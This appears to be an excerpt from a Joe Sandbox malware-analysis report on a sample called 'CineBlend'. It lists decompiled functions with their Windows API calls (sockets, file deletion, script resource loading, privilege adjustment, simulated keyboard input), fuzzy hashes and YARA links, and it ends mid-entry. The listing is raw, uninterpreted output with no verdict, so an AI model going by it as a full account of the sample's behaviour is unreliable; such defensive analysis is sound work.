Opcode Fuzzy Hash: 1442a49103b045d506c8fc85f6046082a5ef04ce9c5dcba02d052e6eeea0f55d
Instruction Fuzzy Hash: 6301D67A6102166BEF1467B89CCAFBA72ECDB08364F1545B1FD12E31E2D9609D0095A0

Function 00BB1C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BB1CD3
WSAGetLastError.WSOCK32 ref: 00BB1CE0
bind.WSOCK32(00000000,?,00000010), ref: 00BB1D17
WSAGetLastError.WSOCK32 ref: 00BB1D22
closesocket.WSOCK32(00000000), ref: 00BB1D51
listen.WSOCK32(00000000,00000005), ref: 00BB1D60
WSAGetLastError.WSOCK32 ref: 00BB1D6A
closesocket.WSOCK32(00000000), ref: 00BB1D99

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: c5bc53b42b4cf7d13f821a6a8e1c9e2c67ca72a3daa35373e038bababfdb6767
Instruction ID: afe6abff60645a7b4cc5e6504681df97479dd2322b3e958c10cc93fee518a520
Opcode Fuzzy Hash: c5bc53b42b4cf7d13f821a6a8e1c9e2c67ca72a3daa35373e038bababfdb6767
Instruction Fuzzy Hash: 08416E756001009FD710DF28C495B6ABBF5EF49318F6885E8E8569F292C7B1EC81CBE1

Function 00B6BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6BD54
_free.LIBCMT ref: 00B6BD78
_free.LIBCMT ref: 00B6BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BD46D0), ref: 00B6BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00C0221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B6BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00C02270,000000FF,?,0000003F,00000000,?), ref: 00B6BFB6
_free.LIBCMT ref: 00B6C0CB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9f9d5ae0e24d29c05d093700737d165f075763f224b435e031cc0e09e084e6da
Instruction ID: 97da30c7f3f24606dad5b880e6a45454829251076124f723b9186eb1f11426c5
Opcode Fuzzy Hash: 9f9d5ae0e24d29c05d093700737d165f075763f224b435e031cc0e09e084e6da
Instruction Fuzzy Hash: 0EC117729002059FDB249F68CC45FAEBBF9EF45320F1445EAE585DB292E7398E81CB50

Function 00B9DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B355D1,?,?,00B74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B35871

Part of subcall function 00B9EAB0: GetFileAttributesW.KERNEL32(?,00B9D840), ref: 00B9EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00B9DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B9DD1B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9DD2C
FindClose.KERNEL32(00000000), ref: 00B9DD43
FindClose.KERNEL32(00000000), ref: 00B9DD4C

Strings

\*.*, xrefs: 00B9DC9D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 90623d3e4c3c2994f1ae639d8deba5e59dd953177bac39bf6207c1d4150051cb
Instruction ID: 4c3464ba79fbbe18ff4489d4eece0ef3579c9667712e9b4faba2262efc7da84f
Opcode Fuzzy Hash: 90623d3e4c3c2994f1ae639d8deba5e59dd953177bac39bf6207c1d4150051cb
Instruction Fuzzy Hash: A8315C35008385ABC700EF64C892CAFB7E8AE96300F504DADF5D583191EF21DA09CB67

Function 00BA3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B756C2,?,?,00000000,00000000), ref: 00BA3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B756C2,?,?,00000000,00000000), ref: 00BA3A35
LoadResource.KERNEL32(?,00000000,?,?,00B756C2,?,?,00000000,00000000,?,?,?,?,?,?,00B366CE), ref: 00BA3A45
SizeofResource.KERNEL32(?,00000000,?,?,00B756C2,?,?,00000000,00000000,?,?,?,?,?,?,00B366CE), ref: 00BA3A56
LockResource.KERNEL32(00B756C2,?,?,00B756C2,?,?,00000000,00000000,?,?,?,?,?,?,00B366CE,?), ref: 00BA3A65

Strings

SCRIPT, xrefs: 00BA3A2B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 602b08bebbd76b7b1ded1902137d5542b9d90c26c3960805a2e362ba30d9562f
Instruction ID: 6d765432a76a11502538b9642af920cfa1dc71f113a1cac36be5af2a0a93e4b7
Opcode Fuzzy Hash: 602b08bebbd76b7b1ded1902137d5542b9d90c26c3960805a2e362ba30d9562f
Instruction Fuzzy Hash: B2113C75204715BFD7218B65DC48F2BBBFDEBC9B51F1442ACB5429B160DB71D9018A20

Function 00B920AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B91900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B91916
Part of subcall function 00B91900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B91922
Part of subcall function 00B91900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B91931
Part of subcall function 00B91900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B91938
Part of subcall function 00B91900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9194E

GetLengthSid.ADVAPI32(?,00000000,00B91C81), ref: 00B920FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B92107
HeapAlloc.KERNEL32(00000000), ref: 00B9210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B92127
GetProcessHeap.KERNEL32(00000000,00000000,00B91C81), ref: 00B9213B
HeapFree.KERNEL32(00000000), ref: 00B92142

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 381810f993caac6cb2b14aa3c7372fb09ac7723b22f8c79256f777d0cd4cdba6
Instruction ID: 7cc24b81017c2233546ed43d593a87d7947ca060086e9fceda1445dbe019776c
Opcode Fuzzy Hash: 381810f993caac6cb2b14aa3c7372fb09ac7723b22f8c79256f777d0cd4cdba6
Instruction Fuzzy Hash: 0A11D076900205FFDF109F64CC09FAE7BB9EF49355F1440A8EA41A7120CB359941CB60

Function 00BAA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00BAA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00BAA6D0

Part of subcall function 00BA42B9: GetInputState.USER32 ref: 00BA4310
Part of subcall function 00BA42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00BAA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00BAA6BA

Strings

*.*, xrefs: 00BAA5A2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: d0da6b8635daaa70b84fcec162892ba779b2d098314d1fb130c34c7eba33d53a
Instruction ID: f68c4a8d867d67a150bfab61cc9daa9c2a6b233edc03dfdc9410e18f5b9525ef
Opcode Fuzzy Hash: d0da6b8635daaa70b84fcec162892ba779b2d098314d1fb130c34c7eba33d53a
Instruction Fuzzy Hash: 24413E7594420AAFCB55DFA4C849AEEBBF4EF16310F24409AE905A21A1EB309E44CF61

Function 00B322AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00B3233E
GetSysColor.USER32(0000000F), ref: 00B32421
SetBkColor.GDI32(?,00000000), ref: 00B32434

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 333e4cd21bd0c2d29b6045fc1a31c15727fa311a416e6f6b57f27c13cdba804d
Instruction ID: 15466ec14246c05908e3b319edbb2a8105acabfde00bfcfadc28a61e4f87d5e5
Opcode Fuzzy Hash: 333e4cd21bd0c2d29b6045fc1a31c15727fa311a416e6f6b57f27c13cdba804d
Instruction Fuzzy Hash: 0181F1B0108400BEE72D6B2C8CDCE7F35DEDB46700F3581D9F612D6695C9699E42A27A

Function 00BB2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BB3AD7
Part of subcall function 00BB3AAB: _wcslen.LIBCMT ref: 00BB3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BB22BA
WSAGetLastError.WSOCK32 ref: 00BB22E1
bind.WSOCK32(00000000,?,00000010), ref: 00BB2338
WSAGetLastError.WSOCK32 ref: 00BB2343
closesocket.WSOCK32(00000000), ref: 00BB2372

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 2131482a221f7f73c6f11dafcca6ff6e4751cc485282f196f480d06719b055d5
Instruction ID: c99942b3bd0f6cfe00a50f25c63712a513440c38916777a7adc38e4243b05d88
Opcode Fuzzy Hash: 2131482a221f7f73c6f11dafcca6ff6e4751cc485282f196f480d06719b055d5
Instruction Fuzzy Hash: F251BFB5A00210AFE710AF24C8C6F6A77E5EB48754F1884DCF9559F3D3CA74AD428BA1

Function 00BC26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00BC275C
IsWindowEnabled.USER32 ref: 00BC276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00BC2777
IsIconic.USER32 ref: 00BC2785
IsZoomed.USER32 ref: 00BC2793

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: fe64dc2d013001ea5f282cd1b1354ca636e352bb7acee4e1272acabeff57bb1b
Instruction ID: 2d0f2f31fd77622f0b080626731015778209ffb38b1ee38fbc0d4edda1b29f31
Opcode Fuzzy Hash: fe64dc2d013001ea5f282cd1b1354ca636e352bb7acee4e1272acabeff57bb1b
Instruction Fuzzy Hash: 1321C1357002109FE7119F26C884F5A7BE5FF95324F5980AEE84A8B352DB71ED42CBA0

Function 00BAD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00BAD8CE
GetLastError.KERNEL32(?,00000000), ref: 00BAD92F
SetEvent.KERNEL32(?,?,00000000), ref: 00BAD943

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: f6d7e25a2b7d60a11ae89a981ced2f359ce10d865db1d4bb596b8ccf6dfd1150
Instruction ID: e094dc61a40d39639241b320fc0b40ebfd4c0d780d3cbfe149cddd9d812df649
Opcode Fuzzy Hash: f6d7e25a2b7d60a11ae89a981ced2f359ce10d865db1d4bb596b8ccf6dfd1150
Instruction Fuzzy Hash: 9F219DB5504705ABE7209F65C888BABB7F8EB42314F1044AAE64692551EB74EA098B50

Function 00B9E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00B746AC), ref: 00B9E482
GetFileAttributesW.KERNEL32(?), ref: 00B9E491
FindFirstFileW.KERNEL32(?,?), ref: 00B9E4A2
FindClose.KERNEL32(00000000), ref: 00B9E4AE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: eb32787be3671d5d9403fa7fd0083c8bbf46eba7bdb797158e982deda8044468
Instruction ID: 77c991b20c8a049cee0590fa94621285b77f69890364b5a0bd5441baf55f9b7d
Opcode Fuzzy Hash: eb32787be3671d5d9403fa7fd0083c8bbf46eba7bdb797158e982deda8044468
Instruction Fuzzy Hash: 9AF0A030410910679610AB38EC0D8AE76ADEE06335B544BA5F836C22E0DB78E9958695

Function 00B8E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B8E5F8

Strings

X64, xrefs: 00B8E680
%.3d, xrefs: 00B8E603

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 640659c1a071daf62dc610e9a87775a32a2ccb63dff20edfec50582223f6bdd7
Instruction ID: ca6ce4fdf43d8e6b919c43eddc4c3095772916aff10993b04917534911c3468e
Opcode Fuzzy Hash: 640659c1a071daf62dc610e9a87775a32a2ccb63dff20edfec50582223f6bdd7
Instruction Fuzzy Hash: F1D012B1C08118D6DB80AA90DCC8CB973FCBB18300F5044E2F91692030FA20DA08E721

Function 00B62992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B62A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B62A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B62AA1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eef19fc407f2438d20a271a3636d56c4cc5a37244443bfbf7ebf00034ba5d7d3
Instruction ID: 8891453907cc250c2da4cb88ace8702bd7bf82a1ea2da28e95084bfee19e50de
Opcode Fuzzy Hash: eef19fc407f2438d20a271a3636d56c4cc5a37244443bfbf7ebf00034ba5d7d3
Instruction Fuzzy Hash: 6131D77490121C9BCB21DF64D9887DDBBF4AF08311F5041EAE80CA7250EB749F858F45

Function 00B92010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B509D8
Part of subcall function 00B5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B509F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B92087
GetLastError.KERNEL32 ref: 00B92097

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 08aec405b3f4506cd286a7d544855e9ece1dbeb33a6af98d6f543a8b301e94f5
Instruction ID: 8ef8639f30502957d5399d18f8990e0e09b101102348cdf21f91a28779e1a01d
Opcode Fuzzy Hash: 08aec405b3f4506cd286a7d544855e9ece1dbeb33a6af98d6f543a8b301e94f5
Instruction Fuzzy Hash: BB119DB1810605BFDB18AF54DC86E6AB7E8EB48710B20846EF44653251EB71AC41CA24

Function 00B8E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B8E664

Strings

X64, xrefs: 00B8E680

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: df16e4852e9488dfb3b50c38383c08f3dd31f3cce8ab994c0abe1b13e7a73a3e
Instruction ID: 8a2f1a070fdb636b47308e9c095a926797c74f4a3335fe7dcd2228d60afd5ec1
Opcode Fuzzy Hash: df16e4852e9488dfb3b50c38383c08f3dd31f3cce8ab994c0abe1b13e7a73a3e
Instruction Fuzzy Hash: 41D0C9B480112DEADB80CB50ECC8DDD73BCBB04304F1006A5F106A2100DB3096489B10

Function 00BA41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BB52EE,?,?,00000035,?), ref: 00BA4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BB52EE,?,?,00000035,?), ref: 00BA4239

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 94801a7248de196531fc59289f4a7efd5f4e20b18082a7a3d5bf6c909058965f
Instruction ID: e787cfd30e0725d4f09f8c21c10e1af73c76318b372b304ef7b39e7bc70d07a7
Opcode Fuzzy Hash: 94801a7248de196531fc59289f4a7efd5f4e20b18082a7a3d5bf6c909058965f
Instruction Fuzzy Hash: AEF0E5357043246AE7201765DC4DFEB76ADEFC9761F0001B5F509D3185DA709900C6B0

Function 00B9BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B9BC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B9BC37

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
